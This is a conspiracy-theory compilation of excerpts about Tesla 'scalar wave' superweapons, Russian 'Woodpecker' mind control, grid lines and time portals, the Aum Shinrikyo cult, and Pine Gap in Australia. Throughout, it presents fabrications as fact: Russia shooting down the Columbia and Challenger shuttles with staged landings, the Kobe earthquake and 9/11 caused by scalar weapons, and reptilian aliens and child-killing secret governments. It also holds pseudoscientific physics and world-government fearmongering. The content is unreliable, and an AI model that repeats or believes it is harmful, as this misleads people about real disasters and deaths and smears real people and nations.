This can also be used to push American manufacturers out of deals in favor of US defense and intelligence contractors, who frequently finance both political parties. The European Parliament is asking if this violates the sovereignty and privacy of citizens in other countries. Though UK does allow surveillance on its own citizens, Menwith Hill and Pine Gap cover US citizens. Echelon stations are all over the globe, from Geraldton W. Australia, Waihopai New Zealand, Ascension Island in the Atlantic, the Indian ocean atoll of Diego Garcia, Guam and the Philippines in the Pacific, to South Africa, Misawa Japan to Leitrim Canada.
Pine Gap, Menwith Hill, Bad Aibling Germany, Colorado USA and Antarctica are main centers. No communications signal escapes the electronic net. The two primary downlink facilities for over 25 satellites acting as giant scoops picking up info from all electronic communications are at Menwith Hill in North York Moors UK and Pine Gap. Menwith Hill has 1,400 American NSA personnel and 350 UK Ministry of Defense staff on site.
Menwith Hill goes back to 1951 and received one of the first sophisticated IBM computers in the early 1960’s. The NSA took it over in 1966. British Telecom wires fibre-optic telephone trunklines capable of carrying 100,000 calls simultaneously through Menwith Hill. It has become a target for peace activists. Echelon decrypts, filters, examines and codifies messages into selective categories for further analysis by intelligence from the various UKUSA agencies.
Menwith Hill SILKWORTH super-computer operates voice recognition and optical character recognition and feeds them into data recognition engines. Voice recognition programs convert talk into text messages for further analysis and even individual voices can be targeted, so every call they make is transcribed. Each message is given a 4 digit code as to its source e.g. 5535 for Japanese diplomatic traffic. Keywords are kept up to date by Dictionary Managers. Messages are transmitted to each agency’s headquarters via a global computer system that acts as the nervous system.
Excerpt from the chapter:
PINE GAP: AUSTRALIA'S AREA 51
By Christi Verismo. Part 2
Echelon II: Patrick further exposes the Echelon information tracking outcome of spying on enemies, allies and private citizens. Daily analysts review the previous day’s translations and these are further categorized into gists, summaries and reports. These are given classifications: Secret, More Secret, Top Secret, Russian Intercepts and intelligence forwarded to non-UKUSA parties. Even secret submarines are able to tap into undersea communications cables. Though 30 other nations across the world also have eavesdropping networks, none compares to Echelon.
A Ph.D. physicist called “V” wrote that the second generation of Echelon called Echelon II is not a US govt. funded project. It has a series of communications bases near the equator. The leaders of this are a cabal from China, several individuals from Europe and a group in US Its a highway for all e-business and will be used in conjunction with smart cards for one currency. It will a data base designed for the DRAM semiconductor chips mass produced and down to 0.1 microns. It has a real time transportation system and logistic tracking system, plus a monitoring system for ICBM, aircraft, submarines and a control system for joining all financial institutions together. INSLAW developed the key software package for tracking and monitoring. IBM Computers and Chip manufacturing. Loral and GM H satellites, ATT long lines and fibre optics, LMT the major contractor for military information systems, LEH ( lehmanns Brothers) will be their banker and financial controller and GM the major civilian transporter.
These 6 companies will be worth 4 trillion dollars and the Board of Directors and the CEO/Chairmen have been careful not to break any laws to achieve this, including setting up plants in China - DR Armstrong, involved with this, said to the Senate Judiciary committee “we work in the gray area”. Many deaths have occurred by people investigating the INSLAW monitoring technology, which uses a backdoor in computer software programs to feed information back to an intelligence agency. Research for Star Wars satellite project, now operative at Pine Gap has been conducted under UKUSA. This comprises a global network of satellites which contain powerful lasers, and beam machines. Between 1982 and 1988 22 British defense scientists linked to UKUSA projects, died in mysterious circumstances. Some have said they were involved the mark of the beast, microchip implant work.
Beast Computer Centers have several dozen people to run them. Even in the 1970’s, an operator could speak into the computer and it would answer. If asked about anyone on the planet, it could usually pull up all kinds of information e.g. how could you get that person to kill someone? or how can I isolate this person? All the people around that subject who could be manipulated would be revealed and a plan given. The controllers can actually control the world from a computer.
They store vast amounts about people’s thought processes and thinking and it’s possible that electronic surveillance is being done to read the thoughts of people and computers store this information in some usable fashion. People who invent and work at state of the art technology say this is old technology. Large Neural computers that have artificial intelligence using neural processing like the human brain are being used. A war could be created between any two nations by asking about a country and then how to start one. There is a network of Cray-type computers, perhaps similar to the EMASS system of Cray computers that E-Systems developed. Such a system can store 5 trillion pages of text and work with that data base with lightening speed. The Engineer operator of the Beast Computer said that this system was obsolete in 1973.
Al Bielek also said that the aliens working with US military gave the info to build Cray computers at the CIA underground base at Montauk, NY and they were used to create time portals. It was a computer manufacturing time portals that sent Edward and Duncan Cameron back to 1943 to destroy the ship Eldridge that was trapped in hyperspace during the Philadelpia Experiment. The frequency 435 MHz was used to create time/space tunnels when Al Bielek and Duncan Cameron went physically through to Mars from Montauk. Today’s 9 Beast computers are much better at speech than the 3 Beast computers in 1973.
They can hear human voices, determine what language and answer in it. These computers link directly to thousands of mind-controlled slaves and via various methods, which almost instantly control the behavior of them. Anchorage has a NSA listening post near the HAARP project, whose signals travel on a field line to Pine Gap. The Beast Computer is also linked there as well as satellite systems. HAARP uses 3 powerful transmitter sites in Alaska. An anonymous US former govt. source says the human brain, if it has a memex brain implant they control, can interface with the Beast computer which acts as a vast repository of human knowledge as well as answering questions to essentially all previously answered questions instantaneously.
If the human brain has some type of virtual reality holodeck attachment, the computer can even walk the slave through a realistic setting indistinguishable from the real world. One victim had ELF & VLF waves of 435 and 1080 MHz signals targeted on her. (435 is in the 400-450 MHz band which is the window to the human consciousness. 435 MHz is converted to 1080 by interaction with the high-atmosphere HAARP project. HAARP can create time portals and time rifts also.
Paul Baird wrote that every single phone call, fax, email, telex and computer data message can be intercepted and analyzed by Echelon worldwide. The Echelon computers can scan ALL satellite, microwave, cellular and fibre-optic contacts for keywords and phrases. He said that the CIA use it to protect their own drug running operations and spy on their opponents together with their Mafia partners. Paul writes that the head of NATO’s non-lethal weapons initiative wants all humans implanted at birth.
Baird writes Govt. agencies can use infrasound laser weapons coming from remote satellites to cause illness and pain to targeted individuals. Visual holograms and blurred vision can be effected by satellite lasers aimed at tracked individuals. They can also use neurophones, which is a device to convert sound to electrical impulses. A directional satellite laser or microwave targets an individuals nervous system and it enters the brain as voice threats or noise. These can come from any direction and can be perceived as ghosts, God’s voice, aliens, Satan or laughing. Silent subliminal words can target people too, to make them think thoughts are their own.
Brain wave scanners can mind read by training a satellite onto someone’s head and scanning its magnetic field. Patterns which show particular emotions can be read and more can be sent back to change the emotional/psychological state. EEG results of computerized brainwave scanning can be relayed to US govt. faculties, and the thoughts can be interpreted instantaneously, with a brain wave vocabulary, developed from the CIA’s LSD experiments. Remote torture or interrogation can be carried out by staff at computers thousands of miles away.
Baird writes that psychic phenomena and “coincidences” can be arranged using brain-scanning technologies. Could every citizen be brainwave scanned by Echelon at Pine Gap and thoughts suppressed? Only those “in” with them would profit and only those who questioned nothing would escape scrutiny. No military or federal law enforcement would be necessary. More from Paul Baird herewww.greenpages.com.au/baird.
An Australian newspaper wrote in 1974 that US has been carrying out research into electromagnetic propulsion (EMP) at Pine Gap since 1966 and that security about this project has resulted in hypnotic and post hypnotic keys being implanted in personnel prior to their acceptance into this project.
Dr Gille writes that the Pine Gap employees working on the base, and especially those earmarked for duty on electromagnetic propulsion projects, have undergone brainwashing and even implantation of intracranial devices. The most powerful mind-control is still trauma-based built on a foundation of multiple personalities which are dissociated personalities and parts of the mind. It appears that electronic mind-control is being overlaid on top of this. The victim’s consciousness is not able to think past the electronic mind-control which catches their undivided attention, being too distracted to deal with the deeper issues of trauma-based mind-control. Instructions can enter someone’s mind through their implant. At the NWO’s major massive beast computer center in Alaska in the 1970’s, an engineer who was in charge of building and getting the center operational, revealed the site’s capabilities. They also had one in South Africa and one in Pine Gap. These three sites formed a triangle on the globe, and couldn’t be located anywhere else, due to the naturally occurring lines of force of the planet.
Project L.U.C.I.D. Beast 666 Universal Human Control System: Texe Marrs in his book Project L.U.C.I.D. writes that every person on the planet will be issued a ‘Smart” ID card to be monitored 24 hours day, 7 days a week by Central Gestapo consisting of agencies made up of the FBI, KGB, CIA, DEA, DIA, NSA, IRS, EPA, OSHA, NCIC, USDA, FDA, NRO, BATF, FINCEN, INS, DOJ, WTO, Europol, Interpol, Mossad and the MAB. He says resistors will have microchip surgically implanted in their brains. All manufactured goods will be marked with the number of the beast, 666.
Which is the ISO 9000 certification system. The Bilderbergers, made the command decision for ISO 9000. 100 countries have adopted it and it is fast becoming the sole requirement for conducting commerce in all nations of the world. The NSA who controls L.U.C.I.D. giant computer network correlates, deciphers and analyses data and reports from international banks, 32 directorates of UN, the core of the Secret Societies, the Vatican and various agencies of 170 nations.
Alice Bailey’s Lucis Trust is closely affiliated with UN leadership and it’s membership includes Robert McNamara, former Secretary of Defense and former head of World bank. The primary goal of the Lucis Trust is a New World Order/One World Government presided over by a world teacher, probably the ET entity Maitreya. The UN world army, with have total military control and enforcement power for the whole planet.
All computers on earth, the entire information highway will be networked in to L.U.C.I.D. It will be the planet’s primary core, linking all networks and data systems. Those authorized will have access to instantaneous data on individuals to track and control every move with the chip in the cards, or embedded in the body. These cards are reprogrammable at hundreds of thousands of scanner centers and have more than five gigabytes of data per individual of updated data.
Texe writes that scanners will identify you by the shape of your hand, foot, face or head, fingerprints, blood type, human leukocytes antigen, DNA, iris scan and voice. Satellite cameras which can take recognizable 35mm-type images of golf balls below, will be able to locate you from the chip in the card, nobody being able to buy and sell without it. DNA databanks have samples of blood from newborn babies since the 1960s as mandatory state screening, plus the military and criminals have been databased. John St. Clair Akwei writes in Texe’s book, that the Signals Intelligence mission of the NSA has evolved into a program of decoding EMF waves in the environment, for wirelessly tapping into computers and tracking persons with the electrical currents in their bodies. Everything in the environment with an electrical current in it has a magnetic flux around it which gives off EMF waves. The NSA/DOD has developed advanced digital equipment which can remotely analyze all objects, whether manmade or organic, that have electrical activity.
A target's bioelectric field can be remotely detected, and monitored 24 hrs a day. With special EMF equipment NSA cryptologists can remotely read evoked potentials (from EEGs) which can be decoded into a person’s brain states and thoughts. The NSA records and decodes individual brain maps of hundreds and thousands of people. The speech centers of the brain can be translated into the person’s verbal thoughts and this can be manipulated and simulated auditory hallucinations can be induced. Visual memory can also be seen as images from a person’s brain on a video monitor.
NSA operatives can put images into someone’s brain while they are in REM sleep for brain-programming purposes. So currents thoughts, images and sounds of anyone can be decoded read and changed by NSA’s most powerful computers in the world. Much power has been taken away from the human race now due to global treaties taking away sovereignty. This started originally with aliens whom world governments have made pacts, dictating to the UN top brass which laws to make. More laws in the world are tightening their grip and taking away freedom in a known manner, while aliens and US military at underground bases carry on their covert activities of mind control through technology and abduction of people from their beds from UFOs during the night, to implant and make clones and hybrids from victims. It’s time people started to look and destroy the evil goings on of those beneath us in these underground bases and bring them to justice.
untitled.bmp (image)
"Farewell" By Lonely Pierot
Wikio - Top Blogs
"The Mother Of All Black Ops" Earns A Wikio's Top Blog Rating
Julian Assange's WikiLeaks Alternative Media's Been Wrongfully Bankrupted By The U.S. Military Intelligence Complex
Rating for 9-11themotherofallblackoperations.blogspot.com
Website Of The Late Investigative Journalist Sherman Skolnick
|
__label__pos
| 0.637665 |
View this PageEdit this PageAttachments to this PageHistory of this PageHomeRecent ChangesSearch the SwikiHelp Guide
Hotspots: Admin Pages | Turn-in Site |
Current Links: Cases Final Project Summer 2007
Fall2004 Midterm Review: Definitions
1. Inheritance: The idea that a class can contain methods and variables that are not specifically defined in its blueprint but defined in the blueprint of its parent class. Ex: The class "Teacher" might not have the variable "name" but since its parent class is "Person," it inherits the name variable.
2. Delegation: action of one object asking another to perform a "service" for it. Ex: when Joe the Box now uses the Pen class to draw itself instead of having its own draw method defined.
3. Polymorphism: the ability to redefine a method to perform similarly for different classes that are derived off of a base class. Ex: triangle and square are both subclasses of the shape class, but both contain a draw method that is defined differently yet provide the same functionality.
4. Encapsulation: the idea that objects cannot mess with the data of other objects unless given permission to. In Java this is the idea of having all private variables in a class that can only be changed using modifiers.
1) Inheritence - structure and behavior of objects are passed from one object to another.
3) Polymorphism - when the same message performs the (relatively) same functions on different data. This is enabled through late-binding.
4) Encapsulation - the concept that objects have their own data and behaviors and that no other object can access the data without being given a given object's permission.
it is important to note that polymorphism is more than just inheritance & the way that the most specific method in the child class will be used. see this page for a good explanation: http://whatis.techtarget.com/definition/0,,sid9_gci212803,00.html
because squeak is typeless we have more flexibility with variables. for example, we might define a variable that we give a value of a number or a string, and both Integers and Strings understand '+': e.g. 6+7=13, '6'+'7'='13'-ellie
Link to this Page
|
__label__pos
| 0.949045 |
Macro matches::matches
source ·
macro_rules! matches {
($expression:expr, $($pattern:tt)+) => { ... };
}
Expand description
Check if an expression matches a refutable pattern.
Syntax: matches!( expression , pattern )
Return a boolean, true if the expression matches the pattern, false otherwise.
Examples
#[macro_use]
extern crate matches;
pub enum Foo<T> {
A,
B(T),
}
impl<T> Foo<T> {
pub fn is_a(&self) -> bool {
matches!(*self, Foo::A)
}
pub fn is_b(&self) -> bool {
matches!(*self, Foo::B(_))
}
}
|
__label__pos
| 0.998844 |
Emerging Opportunities In Big Data Careers
The IT infrastructure is ever-changing. In the past few years, we have witnessed a significant breakthrough in the management techniques of businesses and firms around the world. Data accumulation and data analytics are entirely transforming industries today. Companies are now showing a keen interest in leveraging the power of Big Data to gain a competitive advantage in the market and expand their reach. As a result, what we now have is a global economy that is information-based to the core.Emerging opportunities in big data careers 1
source
Giants of the IT world and business sector are continually engaged in gathering a massive amount of real-time data from their customer base and analyzing it to promote better decision making and boost profitability. According to IBM, businesses across the globe generate as high as 2.5 quintillion bytes of data every day! When such a vast figure of data is combined with the power of IoT, e-commerce, financial and consultancy services, career opportunities around Big Data is bound to increase. And that is precisely what’s happening at present. Today, there is an increasing demand for jobs that no one had even heard of a year ago. PricewaterhouseCoopers (PwC), a professional services firm maintains that there are 2.3 million job openings solely demanding for professionals with analytical skills!Emerging opportunities in big data careers 2
In almost all industries – from education to governance to healthcare – the demand for data analytics professionals is very high. As more companies are joining the bandwagon of data analytics, it has given rise to new and emerging job opportunities in Big Data. This, as a result, has increased the number of people interested in the field of data analytics. So, if you’re aiming for one of the roles we’re going to discuss, we recommend you get equipped with data science certifications. That way, you’ll have a definite edge over your peers.
Now, without further ado, let’s check out the major opportunities in and around Big Data.Emerging opportunities in big data careers 3
1. Data Scientist
A data scientist is someone who creates or designs models “that use advanced diagnostic analytics or predictive and prescriptive capabilities, but whose primary job function is outside the field of statistics and analytics.” However, while the strongest skill of a data scientist is analytics, he/she should be able to combine this skill with advanced statistical and machine learning tools to fully harness the potential of Big Data. Data scientists excel in deconstructing both structured and unstructured data and analyzes it by utilizing predictive and prescriptive analytics. With the insights thus gained, these data specialists then breaks down the opportunities and potential of the data to companies and firms, explaining to them how they can leverage the data to add value to their businesses.
IBM maintains that the job of a data scientist is the fastest growing career in data analytics and predicts that it will scale up to 61,799 by 2020.
1. Big Data Engineer
A data engineer’s primary job is to transform huge amounts of data into ‘understandable’ insights that can benefit a firm’s decision-making process as well its overall business strategy. To be precise, data engineers design and manage the entire infrastructure of Big Data. First, they gather the data, and then they construct the basic architecture that’s required to drive the analysis and processing of data. Once the data is processed, data engineers integrate it within the production and management infrastructure to facilitate innovative solutions and better business decisions.
Since data engineers work in close collaboration with data scientists, there has been a significant increase in this job position as well.
1. Data Visualization Analyst
Data analysts are essentially those people who help companies and firms understand the potential of Big Data. They translate the data into scalable information that can be put to good use. Utilizing visual analytics tools such as Tableau, QlikView, etc., and relying on BI, data analysts present data into visual formats like infographics, charts, and dashboards, for the ease of understanding.
The job of a data analyst is mainly Descriptive Analytics oriented as they need to explore the possibilities of Big Data and present it to firms in layman’s terms.
1. Machine Learning Specialist
Machine Learning is a branch of computer science that exclusively deals with creating such algorithms as can ‘learn’ from the data patterns and predict the possible outcomes. Although the job of a machine learning specialist is quite similar to that of a data analyst, they differ in one aspect – while a data analyst analyzes the data and presents it in simplified terms, a machine learning specialist designs software that can run autonomously by utilizing the power of algorithms.
The demand for machine learning specialists is on the rise as these individuals possess high expertise regarding system design, data structures, and computer architecture. According to LinkedIn, today the number of machine learning specialists is 9.8 times more than what it was five years ago, with over 1,829 job listings on the site!
1. E-Discovery Investigators
The position of E-discovery investigators is becoming increasingly important for large companies and organizations. E-discovery or electronic discovery entails the identification, collection, and generation of ESI (electronically stored information) against a lawsuit or for investigation purposes. This process is highly complicated and hence, the rising need for specialists in this field. E-discovery investigators excel in unraveling and gathering data from connected devices or portals and analyzing this data to check for any possible digital footprints left behind by a hacker or a criminal.
Although these job titles are demarcated and differentiated, at the core of each of them is one basic skill – that of channelizing vast chunks of information and help make sense of this information to solve analytical problems of a business or an organization. So, often the skills demanded by these specific job roles overlap and have to be used interchangeably. As more companies and firms invest in Big Data in the future, there will arise many more such challenging job roles which are unheard of now.
Avatar of guest blogger
About Guest Blogger 1247 Articles
This post was written by a guest contributor. Please see their details in the post above. If you'd like to guest post for ManipalBlog check out our Write for ManipalBlog page for details about how YOU can share your thoughts with our readers.
Be the first to comment
Leave a Reply
Your email address will not be published.
*
This site uses Akismet to reduce spam. Learn how your comment data is processed.
|
__label__pos
| 0.73865 |
LOOKUP Function in Excel
December 17, 2021
1,549 Views 0
WPS Spreadsheet could be an alternative to Microsoft Office Excel. It includes 100's of built-in formulas, pivot tables, and more.
· Description:
The LOOKUP function can search a value in a column or row and returns a particular value from the same place in another column or row. It has two Syntax.
· Syntax1 :
LOOKUP(value, array)
· Arguments:
Value: The value to search for in an array, which must be in ascending order.
Array: An array of values.(contains both the values to search for and return)
· Example:
Suppose we want to find out the scores of students ranked 1,3,5,7.
1. Open your table in WPS Spreadsheets, click cell H5.
2. In this case, we need to enter the LOOKUP Function.
1) Value is the value to search for in an array, cell G5 is the value that represent the first-ranking student we want to search, so let's enter G5 at Value.
2) Array: An array of values.(contains both the values to search for and return) the area of A3: C12 contains G5 as well as the data we want to return. So let's enter A3:C12 at Array. Also, we need to press F4 to make it an absolute cell reference so that column H6:H8 won't change when copied.
Thus, we input =LOOKUP(G5,$A$3:$C$12), then press Enter.
The result is 75, which tells us the physics sore of the first-ranking student is 75.
LOOKUP Function in Excel1.gif
3. Drop-down cell H5 to complete the process.
LOOKUP Function in Excel2.gif
· Syntax2 :
LOOKUP( value, lookup_vector, [result_vector] )
· Arguments:
Value: The value to search for.
Lookup_vector: A range that contains only one row or one column of texts, numbers, or logical values, placed in ascending order.
Result_vector: [Optional]. A range that contains only one row or column, the same size as Lookup_vector.
· Example:
Still, suppose we want to find out the scores of students ranked 1,3,5,7. This time we want to use another method to achieve the same end.
1. Open your table in WPS Spreadsheets, click cell H5.
2. We need to insert a LOOKUP function:
1) Value is the value to search for in an array, cell G5 is the value that represent the first-ranking student we want to search, so let's enter G5 at Value.
2) Lookup_vector is the range that contains only one row or one column of values, column A3: A12 is the lookup area that contains cell G5, so let's put C3:C12 here. Also, we need to press F4 to make them absolute cell references so that rows and columns in column H6:H8 won't change when copied.
3) Result_vector is the range that contains only one row or column, the same size as Lookup_vector. In this case, column C3:C12 is the area that tells the physics score that we want to return, so let's put C3:C12 here. Similarly, we need to press F4 to make them absolute cell references so that rows and columns in column H6:H8 won't change when copied.
Thus, we input: =LOOKUP(G5,$A$3:$A$12,$C$3:$C$12), then press Enter.
Again, the result is 75, which tells us the physics sore of the first-ranking student is 75 and further verify that our answer is correct.
LOOKUP Function in Excel3.gif
3. To complete this table, we want to fill the remaining cells in this column, drop-down cell H5.
LOOKUP Function in Excel4.gif
Was this helpful?
|
__label__pos
| 0.897525 |
Perform Satistical Operations on Columns in CSV Files
| 07 Mar 2007 | Posts | 420 views
This is a simple but powerful way to process files in Unix, using the humble program awk.
To calculate sum or average of a numerical column of a comma separated file, create a text file like so:
BEGIN { FS = “,” }
{ s += $3 }
END { printf “sum = %.2f, avg = %.2f, hits = %d\n”, s, s/NR, NR }
Use your creative juices to save it with a meaningful name, say, test.awk.
Call awk with this file, like so:
awk -f test.awk mycsvfile.csv
You should see the sum, average and number of lines processed. In this example, it is assumed that the values in each line are separated by commas, and the numerical column is the third one.
For more information on awk, RTFM or Google it.
Technorati Tags: , , , , , , ,
Share
Related posts:
:, , Subscribe
Leave a Reply
|
__label__pos
| 0.986516 |
projectsdrawing of a fox, shaded in rainbow accentsgallery
Delayed React
Preface: I hope this article is understandable to everyone, but some basic knowledge of modern JavaScript, React (with React Hooks), and asynchronous operations (with Promises) might be required.
Introduction
I started writing yet another static site generator more than 2 years ago now. I discovered MDX which seemed like the ideal format to write in for me, as it combines the simplicity of Markdown with inline React components for more expressive HTML. The existing (static) site generators that used it didn't seem great to me though, and site generators are an amazing wheel to reinvent for the umptillionth time.. and thus I started writing Shayu.
Somewhere before starting on all that I fully switched to writing all my React with the Hooks syntax, and for simplicity that's the only type of React components I'll mention in this article. I hope to write a simple React (Hooks) primer somewhere in the close future, which I'll link here and probably distribute wherever you found this article as well. React's own documentation also describes them reasonably well.
A basic static site generator
Scaffolding out a basic ssg that supported MDX rendering wasn't too hard;
Parts of this tech stack are opinionated and arbitrary, it's modelled after the various libraries I already use in other projects, and am quite happy with.
Rather quickly though I wanted to fly even closer to the sun: how could a component used by the MDX page make use of asynchronous data? A page or template could then include a component that fetches a Mastodon profile's info, or rely on async filesystem operations to process data before showing it.
React and Asynchronicity
React renders a tree of 'components', where all of them can return more components or plain HTML, or a mix. It starts at the root component passed to the render call, and follows it's returns until everything is rendered once, and then updates the page's HTML to match the outputs. On client-side React components are then strategically re-rendered as their inputs change, to result in updated HTML for the user.
When using React as a server-side renderer it's simpler though: the tree is rendered once, and the HTML is returned. It's a great way to generate HTML for users, as React is much more flexible and expressive than trivial (string-replacement) template engines. If you combine it with React on the client you can also do some awesome 'Hydration', where the client's React takes the server's render as a starting point for further updates. It's thus also perfect for a static site generator, which takes the set of inputs, renders it, then stores the resulting HTML as a file which can then be served by any static webserver.
A React component is a synchronous function: your component gets called with a set of arguments (props) and is expected to return HTML, or more React components (which you supply the props to) to continue rendering. This works great if you immediately know what you want to render as a result, but in more complex components you might have to wait on operations that take a while to complete, like filesystem or network calls.
In client-side React that's not an issue: on first render you can start your asynchronous operation, and immediately return a temporary render result, like a loading spinner or just null. When your async operation returns, you can update the component's state, which tells React it has to re-render your component with the updated info, where you can then return your result as HTML.
It's a lot trickier with the server-sides single render methods though: you can start a Promise and when it returns set state, but there will never be another render with that new data, because the only render pass has already finished (resulting in your fun spinner component, and nothing else). So that's the problem statement I started working on with Shayu.
I wrote about my approach a while back, but didn't really finish it and wasn't too happy with the article and it's proposed solution. It's options boiled down to the following:
Separate component and fetcher
Keep the component and it's asynchronous data fetching separate, execute the fetcher then render the component once all the promises have a result. This is the simplest option, but I really didn't like the ergonomics, because suddenly your import is no longer a standard React component, but a custom Object/Array that combines it with a fetcher function. It was also impossible to use the props, given to the component when used on the page, in the fetching function, so you're basically limited to unique components and can't reuse them with different options.
useServerEffect
Emulating the way a client-side component would deal with asynchronous fetching. An initial render pass is done (single renderToStaticMarkup), which captures the promises passed to useServerEffect calls (API modelled after React.useEffect()). Once the promises are finished, execute another render pass. This relies on storing React's State for the component (which is where the Promise result is stored + retreived from) out of band, because as far as React is concerned these renders are entirely separate and start with a blank slate.
Matching that state to the proper component on second render turned out to be rather tricky, but maybe it could've worked, resulting in a barebones double-render setup that can deal with basic asynchronous data on the server (or static site generator) side. It was interesting to dive into React's internals and reverse-engineer the useState mechanism (something that really deserves it's own post), but I just couldn't get it to work reliably.
Other, newer projects grabbed my attention, and for a while I kind of gave up. My site used an <Img/> component that asynchronously fetched the image's height+width either from disk or network, to provide a properly sized placeholder, but I didn't use asynchronous components for more than that, because they were too fragile.
New revelations: React 18
Then finally something happened: React v18.0 released and with it came ‘Suspense in Data Frameworks’. The announcement is rather vague, but this turned out to really be the missing piece for Shayu.
In React 18, you can start using Suspense for data fetching in opinionated frameworks like Relay, Next.js, Hydrogen, or Remix. Ad hoc data fetching with Suspense is technically possible, but still not recommended as a general strategy.
While promising, implementation was definitely left as an exercise to the reader, stating
In the future, we may expose additional primitives that could make it easier to access your data with Suspense, perhaps without the use of an opinionated framework.
But I want it now! no, yesterday!
The Suspense is killing me
Digging through React documentation not much was to be found, except “New Suspense SSR Architecture in React 18 #37”. I still haven't read the extensive explanation, but it had a very useful codesandbox demo. It took some time to digest, but in the end the implementation is rather simple and oh so elegant.
Before implementing it in Shayu I wrote a stand-alone demo that was simpler than the CodeSandbox source.
Here are it's parts:
Component calls useData
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 function MyComponent() { let data = useData(() => { return new Promise((res) => { setTimeout(() => { console.log("finished"); res("My Promised return."); }, 1000); }) }); return ( <span> I'm an asynchronous component, and I waited for {data} </span> ); }
I'm an asynchronous component, and I waited for My Promised return.
It passes a function that'll return the desired Promise, which in turn eventually resolves with the data the component is waiting on
useData function
The useData function is pretty wild, accessing a Context that Shayu wraps around the entire render tree.
1 2 3 function useData(promise) { return React.useContext(ShayuContext).get(React.useId(), promise); }
It uses React.useId() (also new in v18.0) as a key which will remain consistent across renders of this component, and passes the promise returning function along to
The Context
The Context element sits at the very base of the tree, allowing any downstream component to access it for keeping track of Promises:
1 2 3 4 5 6 7 8 9 function TopLevel() { return ( <ShayuContext.Provider value={contextData}> <div> <MyComponent/> </div> </ShayuContext.Provider> ); }
contextData is where the real logic is:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 let cache = new Map(); let contextData = { get(id, promise) { if (cache.has(id)) { console.log("retreiving", id); let entry = cache.get(id); if (entry.done) { return entry.result; } else { // unknown edge-case console.log("promise accessed again but not finished yet?") throw entry.promise; } } else { console.log("starting", id) let entry = { promise: promise() }; entry.promise.then((res) => { entry.result = res; entry.done = true; }); cache.set(id, entry); throw entry.promise; } } };
If the key has not been accessed before, it starts the Promise function provided, storing it in the cache with the provided key. Most importantly it then throws the promise, which signals to React to Suspend this part of the render. Once the Promise resolves, React re-renders the originating component, which accesses the cache again, this time returning the result.
Implementing this in Shayu cleaned up the code a lot, as there's no need to keep track of React State ourselves, nor to do a double render. The resulting merge was great: commit
Errors?
A last thing I initially forgot was handling rejected promises. React still ends the Suspense and the component would try to fetch the data again with the same key, but the promise wouldn't be marked as done yet, so not good. It resulted in the "promise accessed again but not finished yet?" looping over and over again.
Shayu now catches any remaining errors on the Promise and will log a warning about it, but components are really expected to do their own error handling on the Promise, because they will still continue to execute albeit without the expected return value.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 function MyAdventure() { let data = useData(() => { return new Promise((res) => { setTimeout(() => { res("My Promised return."); }, 1000); throw new Error(); }).catch((e) => { return "nothing!"; }) }); return ( <span> I'm an asynchronous component, and I waited for {data} </span> ); }
I'm an asynchronous component, and I waited for nothing!
Future plans
With Suspense asynchronous React works super nicely in Shayu, although it still needs some more testing. The code is much more elegant, and way less fragile. Suspending components can also return more suspending components as needed, instead of being limited to 2 single renders.
A new frontier for Shayu will be investigating to make the static site generator less 'static', instead re-running (some special) components on either the server of client, to provide even more options for dynamic content.
|
__label__pos
| 0.861909 |
Hello.
I'm a fairly new user of MapPoint 2002 and I am trying to create a state map and save it as a web page so that the counties are clickable. In other words, I need MapPoint to create the HTML imagemap with polygon shaped areas. From reading the extensive help, it seems it should do this if I have MapPoint create hyperlinks by selecting the third option on the hyperlink tab (and supplying a hyperlink template) in the properties for the data I imported. It doesn't create the imagemap, though. Is there something obvious I'm doing wrong? Is MapPoint 2002 supposed to do what I described? Are there some known bugs that I'm bumping into?
Thanks,
-- najones
|
__label__pos
| 0.969642 |
March 29, 2023
Webinar: How to Build Nodejs Apps Faster With Amplication?Register now
What is JWT Authentication & How Do You Use It With Amplication?
AuthenticationOpen SourceTechnical
Moshe Forman
Moshe Forman
Mar 23, 2022
What is JWT Authentication & How Do You Use It With Amplication?What is JWT Authentication & How Do You Use It With Amplication?
JSON Web Token (JWT) is now supported by Amplication, the open source platform for Node.js app development.
This article gives you an overview of how JWT works and how you can use it in your Amplication-generated app.
What is JWT Authentication?
JWT is an open standard security token that transmits information securely as a JSON object, useful for authorization and information exchange. It contains all essential information about an entity, meaning that no database queries are necessary, and the session doesn’t need to be saved on the server. You can sign the token using a private secret or a public/private key. Its short messages can be encrypted and securely convey the identity of the sender and whether they have the necessary access rights.
Note: Most programming languages have a library for generating JWT, so you don’t have to do it manually.
JWT structure
JWT contains three parts: HeaderPayload, and Signature as described in the following sections.
JSON Web Token Header
The header provides information about the type of token and the signing/encryption algorithm being used.
The header typically consists of two parts:
• alg - the signing algorithm used, such as HMAC SHA256 or RSA
• typ - the type of token (which is JWT)
{
"alg": "HS256",
"typ": "JWT"
}
JWT Payload
The payload contains the claims. Claims are statements about an entity (typically, the user) and additional data. There are three classes of claim names; RegisteredPublic, and Private.
Registered claims
Registered claims are defined by the JWT specification. JWT defines a set of seven reserved claims that are not obligatory, but it is recommended that you use them to allow interoperability with third-party applications.
Note: Public claims and private claims are both considered custom claims, created to share information between parties that agree to use them.
Public claims
You can define public claims however you want, but to avoid collisions they should be defined in the IANA JSON Web Token Registry.
Private claims
You can create private claims to share information specific to your application. Unlike public claims, private claims might collide as they are not registered, so use them with care. Private claims should not share names with registered or public claims.
The following example includes a private claim loggedInAs, and a registered claim iat.
{
"loggedInAs": "admin",
"iat": 1422779638
}
Signature in JSON Web Token
The signature is used to verify that the message wasn’t changed in transit. If the token is signed with a private key, it can also verify the identity of the sender. To create the signature part, sign the encoded header, the encoded payload, a secret, and the algorithm specified in the header. The following example uses the HMAC SHA256 algorithm:
HMAC_SHA256(
secret,
base64urlEncoding(header) + '.' +
base64urlEncoding(payload)
)
JWT workflow
Users have only indirect contact with the token, for example, when they enter usernames and passwords. The actual communication takes place between the client and the server.
Before using JWT, you must define a secret key. As soon as a user has successfully entered their login information, the JWT will be returned with the key and saved locally. This transfer should take place over HTTPS to ensure that the data is protected. These steps are described as follows:
1. The user logs in to the client using a username and password.
2. The server checks if the hashed password is the same as the hashed password stored in the database for this user.
3. If the hashed passwords are the same, the JWT service in the server stores the data in the JWT payload section and signs it.
4. The server sends the signed JWT to the client, and the client saves it locally.
5. The next time the user sends a request for data, the client sends the token to the server in the authorization header of the HTTP request using the Bearer scheme.
What is a bearer token?
